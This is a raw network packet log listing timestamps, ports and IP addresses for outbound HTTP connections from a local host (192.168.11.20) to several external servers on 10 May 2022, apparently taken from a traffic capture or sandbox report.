May 10, 2022 14:22:50.511066914 CEST	80	49759	203.170.86.89	192.168.11.20
May 10, 2022 14:22:50.511113882 CEST	80	49759	203.170.86.89	192.168.11.20
May 10, 2022 14:22:50.511157990 CEST	80	49759	203.170.86.89	192.168.11.20
May 10, 2022 14:22:50.511166096 CEST	49759	80	192.168.11.20	203.170.86.89
May 10, 2022 14:22:50.511204004 CEST	80	49759	203.170.86.89	192.168.11.20
May 10, 2022 14:22:50.511204958 CEST	49759	80	192.168.11.20	203.170.86.89
May 10, 2022 14:22:50.511250019 CEST	80	49759	203.170.86.89	192.168.11.20
May 10, 2022 14:22:50.511295080 CEST	80	49759	203.170.86.89	192.168.11.20
May 10, 2022 14:22:50.511311054 CEST	49759	80	192.168.11.20	203.170.86.89
May 10, 2022 14:22:50.511341095 CEST	80	49759	203.170.86.89	192.168.11.20
May 10, 2022 14:22:50.511385918 CEST	80	49759	203.170.86.89	192.168.11.20
May 10, 2022 14:22:50.511430025 CEST	80	49759	203.170.86.89	192.168.11.20
May 10, 2022 14:22:50.511441946 CEST	49759	80	192.168.11.20	203.170.86.89
May 10, 2022 14:22:50.511475086 CEST	80	49759	203.170.86.89	192.168.11.20
May 10, 2022 14:22:50.511519909 CEST	80	49759	203.170.86.89	192.168.11.20
May 10, 2022 14:22:50.511567116 CEST	80	49759	203.170.86.89	192.168.11.20
May 10, 2022 14:22:50.511588097 CEST	49759	80	192.168.11.20	203.170.86.89
May 10, 2022 14:22:50.511611938 CEST	80	49759	203.170.86.89	192.168.11.20
May 10, 2022 14:22:50.511626959 CEST	49759	80	192.168.11.20	203.170.86.89
May 10, 2022 14:22:50.511658907 CEST	80	49759	203.170.86.89	192.168.11.20
May 10, 2022 14:22:50.511693001 CEST	49759	80	192.168.11.20	203.170.86.89
May 10, 2022 14:22:50.511706114 CEST	80	49759	203.170.86.89	192.168.11.20
May 10, 2022 14:22:50.511742115 CEST	49759	80	192.168.11.20	203.170.86.89
May 10, 2022 14:22:50.511751890 CEST	80	49759	203.170.86.89	192.168.11.20
May 10, 2022 14:22:50.511797905 CEST	80	49759	203.170.86.89	192.168.11.20
May 10, 2022 14:22:50.511842012 CEST	80	49759	203.170.86.89	192.168.11.20
May 10, 2022 14:22:50.511859894 CEST	49759	80	192.168.11.20	203.170.86.89
May 10, 2022 14:22:50.511895895 CEST	80	49759	203.170.86.89	192.168.11.20
May 10, 2022 14:22:50.511909008 CEST	49759	80	192.168.11.20	203.170.86.89
May 10, 2022 14:22:50.511934042 CEST	80	49759	203.170.86.89	192.168.11.20
May 10, 2022 14:22:50.511981964 CEST	80	49759	203.170.86.89	192.168.11.20
May 10, 2022 14:22:50.511986971 CEST	49759	80	192.168.11.20	203.170.86.89
May 10, 2022 14:22:50.512027979 CEST	80	49759	203.170.86.89	192.168.11.20
May 10, 2022 14:22:50.512068033 CEST	49759	80	192.168.11.20	203.170.86.89
May 10, 2022 14:22:50.512073994 CEST	80	49759	203.170.86.89	192.168.11.20
May 10, 2022 14:22:50.512120008 CEST	80	49759	203.170.86.89	192.168.11.20
May 10, 2022 14:22:50.512165070 CEST	80	49759	203.170.86.89	192.168.11.20
May 10, 2022 14:22:50.512185097 CEST	49759	80	192.168.11.20	203.170.86.89
May 10, 2022 14:22:50.512209892 CEST	80	49759	203.170.86.89	192.168.11.20
May 10, 2022 14:22:50.512233973 CEST	49759	80	192.168.11.20	203.170.86.89
May 10, 2022 14:22:50.512257099 CEST	80	49759	203.170.86.89	192.168.11.20
May 10, 2022 14:22:50.512301922 CEST	80	49759	203.170.86.89	192.168.11.20
May 10, 2022 14:22:50.512320042 CEST	49759	80	192.168.11.20	203.170.86.89
May 10, 2022 14:22:50.512347937 CEST	80	49759	203.170.86.89	192.168.11.20
May 10, 2022 14:22:50.512392998 CEST	80	49759	203.170.86.89	192.168.11.20
May 10, 2022 14:22:50.512401104 CEST	49759	80	192.168.11.20	203.170.86.89
May 10, 2022 14:22:50.512439013 CEST	80	49759	203.170.86.89	192.168.11.20
May 10, 2022 14:22:50.512485027 CEST	80	49759	203.170.86.89	192.168.11.20
May 10, 2022 14:22:50.512499094 CEST	49759	80	192.168.11.20	203.170.86.89
May 10, 2022 14:22:50.512531042 CEST	80	49759	203.170.86.89	192.168.11.20
May 10, 2022 14:22:50.512571096 CEST	49759	80	192.168.11.20	203.170.86.89
May 10, 2022 14:22:50.512578011 CEST	80	49759	203.170.86.89	192.168.11.20
May 10, 2022 14:22:50.512624025 CEST	80	49759	203.170.86.89	192.168.11.20
May 10, 2022 14:22:50.512651920 CEST	49759	80	192.168.11.20	203.170.86.89
May 10, 2022 14:22:50.512667894 CEST	80	49759	203.170.86.89	192.168.11.20
May 10, 2022 14:22:50.512725115 CEST	49759	80	192.168.11.20	203.170.86.89
May 10, 2022 14:22:50.512831926 CEST	49759	80	192.168.11.20	203.170.86.89
May 10, 2022 14:23:20.561522961 CEST	49759	80	192.168.11.20	203.170.86.89
May 10, 2022 14:24:21.103861094 CEST	49765	80	192.168.11.20	180.76.247.231
May 10, 2022 14:24:22.114672899 CEST	49765	80	192.168.11.20	180.76.247.231
May 10, 2022 14:24:24.129748106 CEST	49765	80	192.168.11.20	180.76.247.231
May 10, 2022 14:24:28.144753933 CEST	49765	80	192.168.11.20	180.76.247.231
May 10, 2022 14:24:36.158368111 CEST	49765	80	192.168.11.20	180.76.247.231
May 10, 2022 14:24:44.213227034 CEST	49766	80	192.168.11.20	180.76.247.231
May 10, 2022 14:24:44.707719088 CEST	49767	80	192.168.11.20	180.76.247.231
May 10, 2022 14:24:45.218929052 CEST	49766	80	192.168.11.20	180.76.247.231
May 10, 2022 14:24:45.718895912 CEST	49767	80	192.168.11.20	180.76.247.231
May 10, 2022 14:24:47.234225988 CEST	49766	80	192.168.11.20	180.76.247.231
May 10, 2022 14:24:47.734136105 CEST	49767	80	192.168.11.20	180.76.247.231
May 10, 2022 14:24:51.248868942 CEST	49766	80	192.168.11.20	180.76.247.231
May 10, 2022 14:24:51.748754025 CEST	49767	80	192.168.11.20	180.76.247.231
May 10, 2022 14:24:59.262805939 CEST	49766	80	192.168.11.20	180.76.247.231
May 10, 2022 14:24:59.762623072 CEST	49767	80	192.168.11.20	180.76.247.231
May 10, 2022 14:25:21.447094917 CEST	49768	80	192.168.11.20	217.160.0.18
May 10, 2022 14:25:21.459778070 CEST	80	49768	217.160.0.18	192.168.11.20
May 10, 2022 14:25:21.460067987 CEST	49768	80	192.168.11.20	217.160.0.18
May 10, 2022 14:25:21.460128069 CEST	49768	80	192.168.11.20	217.160.0.18
May 10, 2022 14:25:21.472784996 CEST	80	49768	217.160.0.18	192.168.11.20
May 10, 2022 14:25:21.478069067 CEST	80	49768	217.160.0.18	192.168.11.20
May 10, 2022 14:25:21.478118896 CEST	80	49768	217.160.0.18	192.168.11.20
May 10, 2022 14:25:21.478463888 CEST	49768	80	192.168.11.20	217.160.0.18
May 10, 2022 14:25:21.478518963 CEST	49768	80	192.168.11.20	217.160.0.18
May 10, 2022 14:25:21.491286039 CEST	80	49768	217.160.0.18	192.168.11.20
May 10, 2022 14:25:23.501492977 CEST	49769	80	192.168.11.20	217.160.0.18
May 10, 2022 14:25:23.514305115 CEST	80	49769	217.160.0.18	192.168.11.20
May 10, 2022 14:25:23.514463902 CEST	49769	80	192.168.11.20	217.160.0.18
May 10, 2022 14:25:23.516134024 CEST	49769	80	192.168.11.20	217.160.0.18
May 10, 2022 14:25:23.516216993 CEST	49769	80	192.168.11.20	217.160.0.18
May 10, 2022 14:25:23.528911114 CEST	80	49769	217.160.0.18	192.168.11.20
May 10, 2022 14:25:23.528959036 CEST	80	49769	217.160.0.18	192.168.11.20
May 10, 2022 14:25:23.529009104 CEST	80	49769	217.160.0.18	192.168.11.20
May 10, 2022 14:25:23.529038906 CEST	80	49769	217.160.0.18	192.168.11.20
May 10, 2022 14:25:23.529161930 CEST	49769	80	192.168.11.20	217.160.0.18
May 10, 2022 14:25:23.529289961 CEST	49769	80	192.168.11.20	217.160.0.18
May 10, 2022 14:25:23.529475927 CEST	80	49769	217.160.0.18	192.168.11.20
May 10, 2022 14:25:23.529509068 CEST	80	49769	217.160.0.18	192.168.11.20
May 10, 2022 14:25:23.529544115 CEST	80	49769	217.160.0.18	192.168.11.20
May 10, 2022 14:25:23.529576063 CEST	80	49769	217.160.0.18	192.168.11.20
May 10, 2022 14:25:23.529736996 CEST	49769	80	192.168.11.20	217.160.0.18
May 10, 2022 14:25:23.529923916 CEST	49769	80	192.168.11.20	217.160.0.18
May 10, 2022 14:25:23.542082071 CEST	80	49769	217.160.0.18	192.168.11.20
May 10, 2022 14:25:23.542146921 CEST	80	49769	217.160.0.18	192.168.11.20
May 10, 2022 14:25:23.542179108 CEST	80	49769	217.160.0.18	192.168.11.20
May 10, 2022 14:25:23.542275906 CEST	49769	80	192.168.11.20	217.160.0.18
May 10, 2022 14:25:23.542357922 CEST	80	49769	217.160.0.18	192.168.11.20
May 10, 2022 14:25:23.542426109 CEST	80	49769	217.160.0.18	192.168.11.20
May 10, 2022 14:25:23.542452097 CEST	49769	80	192.168.11.20	217.160.0.18
May 10, 2022 14:25:23.542499065 CEST	80	49769	217.160.0.18	192.168.11.20
May 10, 2022 14:25:23.542567968 CEST	80	49769	217.160.0.18	192.168.11.20
May 10, 2022 14:25:23.542624950 CEST	49769	80	192.168.11.20	217.160.0.18
May 10, 2022 14:25:23.542731047 CEST	80	49769	217.160.0.18	192.168.11.20
May 10, 2022 14:25:23.542809963 CEST	49769	80	192.168.11.20	217.160.0.18
May 10, 2022 14:25:23.542916059 CEST	80	49769	217.160.0.18	192.168.11.20
May 10, 2022 14:25:23.542952061 CEST	80	49769	217.160.0.18	192.168.11.20
May 10, 2022 14:25:23.542984962 CEST	49769	80	192.168.11.20	217.160.0.18
May 10, 2022 14:25:23.542992115 CEST	80	49769	217.160.0.18	192.168.11.20
May 10, 2022 14:25:23.543073893 CEST	80	49769	217.160.0.18	192.168.11.20
May 10, 2022 14:25:23.543095112 CEST	80	49769	217.160.0.18	192.168.11.20
May 10, 2022 14:25:23.543153048 CEST	49769	80	192.168.11.20	217.160.0.18
May 10, 2022 14:25:23.543155909 CEST	80	49769	217.160.0.18	192.168.11.20
May 10, 2022 14:25:23.543205976 CEST	80	49769	217.160.0.18	192.168.11.20
May 10, 2022 14:25:23.543242931 CEST	80	49769	217.160.0.18	192.168.11.20
May 10, 2022 14:25:23.543299913 CEST	80	49769	217.160.0.18	192.168.11.20
May 10, 2022 14:25:23.543334961 CEST	80	49769	217.160.0.18	192.168.11.20
May 10, 2022 14:25:23.543345928 CEST	49769	80	192.168.11.20	217.160.0.18
May 10, 2022 14:25:23.543378115 CEST	80	49769	217.160.0.18	192.168.11.20
May 10, 2022 14:25:23.543509960 CEST	49769	80	192.168.11.20	217.160.0.18
May 10, 2022 14:25:23.543689013 CEST	49769	80	192.168.11.20	217.160.0.18
May 10, 2022 14:25:23.555304050 CEST	80	49769	217.160.0.18	192.168.11.20
May 10, 2022 14:25:23.555342913 CEST	80	49769	217.160.0.18	192.168.11.20
May 10, 2022 14:25:23.555496931 CEST	49769	80	192.168.11.20	217.160.0.18
May 10, 2022 14:25:23.555674076 CEST	49769	80	192.168.11.20	217.160.0.18
May 10, 2022 14:25:23.555852890 CEST	49769	80	192.168.11.20	217.160.0.18
May 10, 2022 14:25:23.555999994 CEST	80	49769	217.160.0.18	192.168.11.20
May 10, 2022 14:25:23.556058884 CEST	80	49769	217.160.0.18	192.168.11.20
May 10, 2022 14:25:23.556216002 CEST	49769	80	192.168.11.20	217.160.0.18
May 10, 2022 14:25:23.556346893 CEST	80	49769	217.160.0.18	192.168.11.20
May 10, 2022 14:25:23.556392908 CEST	49769	80	192.168.11.20	217.160.0.18
May 10, 2022 14:25:23.556423903 CEST	80	49769	217.160.0.18	192.168.11.20
May 10, 2022 14:25:23.556472063 CEST	80	49769	217.160.0.18	192.168.11.20
May 10, 2022 14:25:23.556530952 CEST	80	49769	217.160.0.18	192.168.11.20
May 10, 2022 14:25:23.556566000 CEST	80	49769	217.160.0.18	192.168.11.20
May 10, 2022 14:25:23.556565046 CEST	49769	80	192.168.11.20	217.160.0.18
May 10, 2022 14:25:23.556612015 CEST	80	49769	217.160.0.18	192.168.11.20
May 10, 2022 14:25:23.556665897 CEST	80	49769	217.160.0.18	192.168.11.20
May 10, 2022 14:25:23.556695938 CEST	80	49769	217.160.0.18	192.168.11.20
May 10, 2022 14:25:23.556749105 CEST	49769	80	192.168.11.20	217.160.0.18
May 10, 2022 14:25:23.556864977 CEST	80	49769	217.160.0.18	192.168.11.20
May 10, 2022 14:25:23.556926012 CEST	49769	80	192.168.11.20	217.160.0.18
May 10, 2022 14:25:23.557068110 CEST	80	49769	217.160.0.18	192.168.11.20
May 10, 2022 14:25:23.557106018 CEST	49769	80	192.168.11.20	217.160.0.18
May 10, 2022 14:25:23.557112932 CEST	80	49769	217.160.0.18	192.168.11.20
May 10, 2022 14:25:23.557208061 CEST	80	49769	217.160.0.18	192.168.11.20
May 10, 2022 14:25:23.557240963 CEST	80	49769	217.160.0.18	192.168.11.20
May 10, 2022 14:25:23.557295084 CEST	80	49769	217.160.0.18	192.168.11.20
May 10, 2022 14:25:23.557324886 CEST	80	49769	217.160.0.18	192.168.11.20
May 10, 2022 14:25:23.557354927 CEST	80	49769	217.160.0.18	192.168.11.20
May 10, 2022 14:25:23.557409048 CEST	80	49769	217.160.0.18	192.168.11.20
May 10, 2022 14:25:23.557440042 CEST	80	49769	217.160.0.18	192.168.11.20
May 10, 2022 14:25:23.557470083 CEST	80	49769	217.160.0.18	192.168.11.20
May 10, 2022 14:25:23.557502985 CEST	80	49769	217.160.0.18	192.168.11.20
May 10, 2022 14:25:23.557523012 CEST	49769	80	192.168.11.20	217.160.0.18
May 10, 2022 14:25:23.557559967 CEST	80	49769	217.160.0.18	192.168.11.20
May 10, 2022 14:25:23.557681084 CEST	80	49769	217.160.0.18	192.168.11.20
May 10, 2022 14:25:23.557720900 CEST	49769	80	192.168.11.20	217.160.0.18
May 10, 2022 14:25:23.557849884 CEST	80	49769	217.160.0.18	192.168.11.20
May 10, 2022 14:25:23.557893991 CEST	49769	80	192.168.11.20	217.160.0.18
May 10, 2022 14:25:23.557917118 CEST	80	49769	217.160.0.18	192.168.11.20
May 10, 2022 14:25:23.557969093 CEST	80	49769	217.160.0.18	192.168.11.20
May 10, 2022 14:25:23.558053970 CEST	49769	80	192.168.11.20	217.160.0.18
May 10, 2022 14:25:23.558142900 CEST	80	49769	217.160.0.18	192.168.11.20
May 10, 2022 14:25:23.558176041 CEST	80	49769	217.160.0.18	192.168.11.20
May 10, 2022 14:25:23.558206081 CEST	80	49769	217.160.0.18	192.168.11.20
May 10, 2022 14:25:23.558243036 CEST	80	49769	217.160.0.18	192.168.11.20
May 10, 2022 14:25:23.558423996 CEST	49769	80	192.168.11.20	217.160.0.18
May 10, 2022 14:25:23.558594942 CEST	49769	80	192.168.11.20	217.160.0.18
May 10, 2022 14:25:23.568121910 CEST	80	49769	217.160.0.18	192.168.11.20
May 10, 2022 14:25:23.568175077 CEST	80	49769	217.160.0.18	192.168.11.20
May 10, 2022 14:25:23.568296909 CEST	80	49769	217.160.0.18	192.168.11.20
May 10, 2022 14:25:23.568305969 CEST	49769	80	192.168.11.20	217.160.0.18
May 10, 2022 14:25:23.568490028 CEST	80	49769	217.160.0.18	192.168.11.20
May 10, 2022 14:25:23.568504095 CEST	49769	80	192.168.11.20	217.160.0.18
May 10, 2022 14:25:23.568839073 CEST	49769	80	192.168.11.20	217.160.0.18
May 10, 2022 14:25:23.569457054 CEST	80	49769	217.160.0.18	192.168.11.20
May 10, 2022 14:25:23.569509983 CEST	80	49769	217.160.0.18	192.168.11.20
May 10, 2022 14:25:23.569653988 CEST	49769	80	192.168.11.20	217.160.0.18
May 10, 2022 14:25:23.569829941 CEST	49769	80	192.168.11.20	217.160.0.18
May 10, 2022 14:25:23.570005894 CEST	49769	80	192.168.11.20	217.160.0.18
May 10, 2022 14:25:23.570358038 CEST	80	49769	217.160.0.18	192.168.11.20
May 10, 2022 14:25:23.570600033 CEST	49769	80	192.168.11.20	217.160.0.18
May 10, 2022 14:25:23.570628881 CEST	80	49769	217.160.0.18	192.168.11.20
May 10, 2022 14:25:23.570713997 CEST	80	49769	217.160.0.18	192.168.11.20
May 10, 2022 14:25:23.570746899 CEST	80	49769	217.160.0.18	192.168.11.20
May 10, 2022 14:25:23.570907116 CEST	80	49769	217.160.0.18	192.168.11.20
May 10, 2022 14:25:23.570946932 CEST	80	49769	217.160.0.18	192.168.11.20
May 10, 2022 14:25:23.570949078 CEST	49769	80	192.168.11.20	217.160.0.18
May 10, 2022 14:25:23.571017027 CEST	80	49769	217.160.0.18	192.168.11.20
May 10, 2022 14:25:23.571129084 CEST	49769	80	192.168.11.20	217.160.0.18
May 10, 2022 14:25:23.571238995 CEST	80	49769	217.160.0.18	192.168.11.20
May 10, 2022 14:25:23.571273088 CEST	80	49769	217.160.0.18	192.168.11.20
May 10, 2022 14:25:23.571398973 CEST	80	49769	217.160.0.18	192.168.11.20
May 10, 2022 14:25:23.571510077 CEST	80	49769	217.160.0.18	192.168.11.20
May 10, 2022 14:25:23.571619034 CEST	80	49769	217.160.0.18	192.168.11.20
May 10, 2022 14:25:23.571877956 CEST	80	49769	217.160.0.18	192.168.11.20
May 10, 2022 14:25:23.572000980 CEST	80	49769	217.160.0.18	192.168.11.20
May 10, 2022 14:25:23.572035074 CEST	80	49769	217.160.0.18	192.168.11.20
May 10, 2022 14:25:23.572098017 CEST	80	49769	217.160.0.18	192.168.11.20
May 10, 2022 14:25:23.572128057 CEST	80	49769	217.160.0.18	192.168.11.20
May 10, 2022 14:25:23.572156906 CEST	80	49769	217.160.0.18	192.168.11.20
May 10, 2022 14:25:23.572350025 CEST	80	49769	217.160.0.18	192.168.11.20
May 10, 2022 14:25:23.572485924 CEST	80	49769	217.160.0.18	192.168.11.20
May 10, 2022 14:25:23.572518110 CEST	80	49769	217.160.0.18	192.168.11.20
May 10, 2022 14:25:23.572565079 CEST	80	49769	217.160.0.18	192.168.11.20
May 10, 2022 14:25:23.572596073 CEST	80	49769	217.160.0.18	192.168.11.20
May 10, 2022 14:25:23.572731018 CEST	80	49769	217.160.0.18	192.168.11.20
May 10, 2022 14:25:23.572762966 CEST	80	49769	217.160.0.18	192.168.11.20
May 10, 2022 14:25:23.572846889 CEST	80	49769	217.160.0.18	192.168.11.20
May 10, 2022 14:25:23.572985888 CEST	80	49769	217.160.0.18	192.168.11.20
May 10, 2022 14:25:23.573018074 CEST	80	49769	217.160.0.18	192.168.11.20
May 10, 2022 14:25:23.573064089 CEST	80	49769	217.160.0.18	192.168.11.20
May 10, 2022 14:25:23.573095083 CEST	80	49769	217.160.0.18	192.168.11.20
May 10, 2022 14:25:23.573230982 CEST	80	49769	217.160.0.18	192.168.11.20
May 10, 2022 14:25:23.573262930 CEST	80	49769	217.160.0.18	192.168.11.20
May 10, 2022 14:25:23.573355913 CEST	80	49769	217.160.0.18	192.168.11.20
May 10, 2022 14:25:23.573388100 CEST	80	49769	217.160.0.18	192.168.11.20
May 10, 2022 14:25:23.573488951 CEST	80	49769	217.160.0.18	192.168.11.20
May 10, 2022 14:25:23.573520899 CEST	80	49769	217.160.0.18	192.168.11.20
May 10, 2022 14:25:23.573570967 CEST	80	49769	217.160.0.18	192.168.11.20
May 10, 2022 14:25:23.573601007 CEST	80	49769	217.160.0.18	192.168.11.20
May 10, 2022 14:25:23.573745966 CEST	80	49769	217.160.0.18	192.168.11.20
May 10, 2022 14:25:23.573777914 CEST	80	49769	217.160.0.18	192.168.11.20
May 10, 2022 14:25:23.573807001 CEST	80	49769	217.160.0.18	192.168.11.20
May 10, 2022 14:25:23.573836088 CEST	80	49769	217.160.0.18	192.168.11.20
May 10, 2022 14:25:23.580915928 CEST	80	49769	217.160.0.18	192.168.11.20
May 10, 2022 14:25:23.581196070 CEST	80	49769	217.160.0.18	192.168.11.20
May 10, 2022 14:25:23.581228018 CEST	80	49769	217.160.0.18	192.168.11.20
May 10, 2022 14:25:23.581314087 CEST	80	49769	217.160.0.18	192.168.11.20
May 10, 2022 14:25:23.581449986 CEST	80	49769	217.160.0.18	192.168.11.20
May 10, 2022 14:25:23.581481934 CEST	80	49769	217.160.0.18	192.168.11.20
May 10, 2022 14:25:23.581530094 CEST	80	49769	217.160.0.18	192.168.11.20
May 10, 2022 14:25:23.581559896 CEST	80	49769	217.160.0.18	192.168.11.20
May 10, 2022 14:25:23.582231045 CEST	80	49769	217.160.0.18	192.168.11.20
May 10, 2022 14:25:23.582333088 CEST	80	49769	217.160.0.18	192.168.11.20
May 10, 2022 14:25:23.582453966 CEST	80	49769	217.160.0.18	192.168.11.20
May 10, 2022 14:25:23.582648993 CEST	80	49769	217.160.0.18	192.168.11.20
May 10, 2022 14:25:23.583389997 CEST	80	49769	217.160.0.18	192.168.11.20
May 10, 2022 14:25:23.583611012 CEST	80	49769	217.160.0.18	192.168.11.20
May 10, 2022 14:25:23.583736897 CEST	80	49769	217.160.0.18	192.168.11.20
May 10, 2022 14:25:23.583852053 CEST	80	49769	217.160.0.18	192.168.11.20
May 10, 2022 14:25:23.583986998 CEST	80	49769	217.160.0.18	192.168.11.20
May 10, 2022 14:25:23.584119081 CEST	80	49769	217.160.0.18	192.168.11.20
May 10, 2022 14:25:23.584150076 CEST	80	49769	217.160.0.18	192.168.11.20
May 10, 2022 14:25:23.584238052 CEST	80	49769	217.160.0.18	192.168.11.20
May 10, 2022 14:25:23.590347052 CEST	80	49769	217.160.0.18	192.168.11.20
May 10, 2022 14:25:23.590398073 CEST	80	49769	217.160.0.18	192.168.11.20
May 10, 2022 14:25:23.590490103 CEST	49769	80	192.168.11.20	217.160.0.18
May 10, 2022 14:25:23.590643883 CEST	49769	80	192.168.11.20	217.160.0.18
May 10, 2022 14:26:23.996373892 CEST	49770	80	192.168.11.20	198.23.49.173
May 10, 2022 14:26:24.112910986 CEST	80	49770	198.23.49.173	192.168.11.20
May 10, 2022 14:26:24.113152027 CEST	49770	80	192.168.11.20	198.23.49.173
May 10, 2022 14:26:24.113207102 CEST	49770	80	192.168.11.20	198.23.49.173
May 10, 2022 14:26:24.229655027 CEST	80	49770	198.23.49.173	192.168.11.20
May 10, 2022 14:26:24.619323015 CEST	49770	80	192.168.11.20	198.23.49.173
May 10, 2022 14:26:24.624233007 CEST	80	49770	198.23.49.173	192.168.11.20
May 10, 2022 14:26:24.624311924 CEST	80	49770	198.23.49.173	192.168.11.20
May 10, 2022 14:26:24.624366999 CEST	80	49770	198.23.49.173	192.168.11.20
May 10, 2022 14:26:24.624418974 CEST	80	49770	198.23.49.173	192.168.11.20
May 10, 2022 14:26:24.624444962 CEST	49770	80	192.168.11.20	198.23.49.173
May 10, 2022 14:26:24.624473095 CEST	80	49770	198.23.49.173	192.168.11.20
May 10, 2022 14:26:24.624527931 CEST	80	49770	198.23.49.173	192.168.11.20
May 10, 2022 14:26:24.624567986 CEST	80	49770	198.23.49.173	192.168.11.20
May 10, 2022 14:26:24.624640942 CEST	80	49770	198.23.49.173	192.168.11.20
May 10, 2022 14:26:24.624639988 CEST	49770	80	192.168.11.20	198.23.49.173
May 10, 2022 14:26:24.624703884 CEST	80	49770	198.23.49.173	192.168.11.20
May 10, 2022 14:26:24.624764919 CEST	80	49770	198.23.49.173	192.168.11.20
May 10, 2022 14:26:24.624810934 CEST	49770	80	192.168.11.20	198.23.49.173
May 10, 2022 14:26:24.624861002 CEST	49770	80	192.168.11.20	198.23.49.173
May 10, 2022 14:26:24.624876022 CEST	49770	80	192.168.11.20	198.23.49.173
May 10, 2022 14:26:24.624887943 CEST	49770	80	192.168.11.20	198.23.49.173
May 10, 2022 14:26:24.624900103 CEST	49770	80	192.168.11.20	198.23.49.173
May 10, 2022 14:26:24.625158072 CEST	49770	80	192.168.11.20	198.23.49.173
May 10, 2022 14:26:24.735904932 CEST	80	49770	198.23.49.173	192.168.11.20
May 10, 2022 14:26:24.736144066 CEST	49770	80	192.168.11.20	198.23.49.173
May 10, 2022 14:26:26.643795013 CEST	49771	80	192.168.11.20	198.23.49.173
May 10, 2022 14:26:26.760170937 CEST	80	49771	198.23.49.173	192.168.11.20
May 10, 2022 14:26:26.760457993 CEST	49771	80	192.168.11.20	198.23.49.173
May 10, 2022 14:26:26.762187958 CEST	49771	80	192.168.11.20	198.23.49.173
May 10, 2022 14:26:26.762265921 CEST	49771	80	192.168.11.20	198.23.49.173
May 10, 2022 14:26:26.878860950 CEST	80	49771	198.23.49.173	192.168.11.20
May 10, 2022 14:26:26.878948927 CEST	80	49771	198.23.49.173	192.168.11.20
May 10, 2022 14:26:26.878987074 CEST	80	49771	198.23.49.173	192.168.11.20
May 10, 2022 14:26:26.879040956 CEST	80	49771	198.23.49.173	192.168.11.20
May 10, 2022 14:26:26.879076958 CEST	80	49771	198.23.49.173	192.168.11.20
May 10, 2022 14:26:26.879112005 CEST	80	49771	198.23.49.173	192.168.11.20
May 10, 2022 14:26:26.879125118 CEST	49771	80	192.168.11.20	198.23.49.173
May 10, 2022 14:26:26.879146099 CEST	80	49771	198.23.49.173	192.168.11.20
May 10, 2022 14:26:26.879182100 CEST	80	49771	198.23.49.173	192.168.11.20
May 10, 2022 14:26:26.879220009 CEST	80	49771	198.23.49.173	192.168.11.20
May 10, 2022 14:26:26.879251957 CEST	49771	80	192.168.11.20	198.23.49.173
May 10, 2022 14:26:26.879476070 CEST	49771	80	192.168.11.20	198.23.49.173
May 10, 2022 14:26:26.995771885 CEST	80	49771	198.23.49.173	192.168.11.20
May 10, 2022 14:26:26.995865107 CEST	80	49771	198.23.49.173	192.168.11.20
May 10, 2022 14:26:26.995939970 CEST	80	49771	198.23.49.173	192.168.11.20
May 10, 2022 14:26:26.995980978 CEST	80	49771	198.23.49.173	192.168.11.20
May 10, 2022 14:26:26.996006012 CEST	49771	80	192.168.11.20	198.23.49.173
May 10, 2022 14:26:26.996023893 CEST	80	49771	198.23.49.173	192.168.11.20
May 10, 2022 14:26:26.996103048 CEST	80	49771	198.23.49.173	192.168.11.20
May 10, 2022 14:26:26.996120930 CEST	49771	80	192.168.11.20	198.23.49.173
May 10, 2022 14:26:26.996148109 CEST	80	49771	198.23.49.173	192.168.11.20
May 10, 2022 14:26:26.996206045 CEST	80	49771	198.23.49.173	192.168.11.20
May 10, 2022 14:26:26.996246099 CEST	80	49771	198.23.49.173	192.168.11.20
May 10, 2022 14:26:26.996315002 CEST	80	49771	198.23.49.173	192.168.11.20
May 10, 2022 14:26:26.996356010 CEST	80	49771	198.23.49.173	192.168.11.20
May 10, 2022 14:26:26.996356964 CEST	49771	80	192.168.11.20	198.23.49.173
May 10, 2022 14:26:26.996401072 CEST	80	49771	198.23.49.173	192.168.11.20
May 10, 2022 14:26:26.996465921 CEST	80	49771	198.23.49.173	192.168.11.20
May 10, 2022 14:26:26.996486902 CEST	49771	80	192.168.11.20	198.23.49.173
May 10, 2022 14:26:26.996505976 CEST	80	49771	198.23.49.173	192.168.11.20
May 10, 2022 14:26:26.996567011 CEST	80	49771	198.23.49.173	192.168.11.20
May 10, 2022 14:26:26.996604919 CEST	80	49771	198.23.49.173	192.168.11.20
May 10, 2022 14:26:26.996643066 CEST	80	49771	198.23.49.173	192.168.11.20
May 10, 2022 14:26:26.996681929 CEST	80	49771	198.23.49.173	192.168.11.20
May 10, 2022 14:26:26.996702909 CEST	49771	80	192.168.11.20	198.23.49.173
May 10, 2022 14:26:26.996840000 CEST	49771	80	192.168.11.20	198.23.49.173
May 10, 2022 14:26:26.997056007 CEST	49771	80	192.168.11.20	198.23.49.173
May 10, 2022 14:26:27.113106966 CEST	80	49771	198.23.49.173	192.168.11.20
May 10, 2022 14:26:27.113183975 CEST	80	49771	198.23.49.173	192.168.11.20
May 10, 2022 14:26:27.113217115 CEST	80	49771	198.23.49.173	192.168.11.20
May 10, 2022 14:26:27.113261938 CEST	80	49771	198.23.49.173	192.168.11.20
May 10, 2022 14:26:27.113292933 CEST	80	49771	198.23.49.173	192.168.11.20
May 10, 2022 14:26:27.113322020 CEST	80	49771	198.23.49.173	192.168.11.20
May 10, 2022 14:26:27.113445997 CEST	80	49771	198.23.49.173	192.168.11.20
May 10, 2022 14:26:27.113481045 CEST	49771	80	192.168.11.20	198.23.49.173
May 10, 2022 14:26:27.113605022 CEST	49771	80	192.168.11.20	198.23.49.173
May 10, 2022 14:26:27.113775015 CEST	49771	80	192.168.11.20	198.23.49.173
May 10, 2022 14:26:27.113828897 CEST	80	49771	198.23.49.173	192.168.11.20
May 10, 2022 14:26:27.113868952 CEST	80	49771	198.23.49.173	192.168.11.20
May 10, 2022 14:26:27.113899946 CEST	80	49771	198.23.49.173	192.168.11.20
May 10, 2022 14:26:27.113931894 CEST	80	49771	198.23.49.173	192.168.11.20
May 10, 2022 14:26:27.113970041 CEST	80	49771	198.23.49.173	192.168.11.20
May 10, 2022 14:26:27.114000082 CEST	80	49771	198.23.49.173	192.168.11.20
May 10, 2022 14:26:27.114029884 CEST	80	49771	198.23.49.173	192.168.11.20
May 10, 2022 14:26:27.114061117 CEST	80	49771	198.23.49.173	192.168.11.20
May 10, 2022 14:26:27.114151955 CEST	80	49771	198.23.49.173	192.168.11.20
May 10, 2022 14:26:27.114187956 CEST	80	49771	198.23.49.173	192.168.11.20
May 10, 2022 14:26:27.114195108 CEST	49771	80	192.168.11.20	198.23.49.173
May 10, 2022 14:26:27.114243984 CEST	80	49771	198.23.49.173	192.168.11.20
May 10, 2022 14:26:27.114275932 CEST	80	49771	198.23.49.173	192.168.11.20
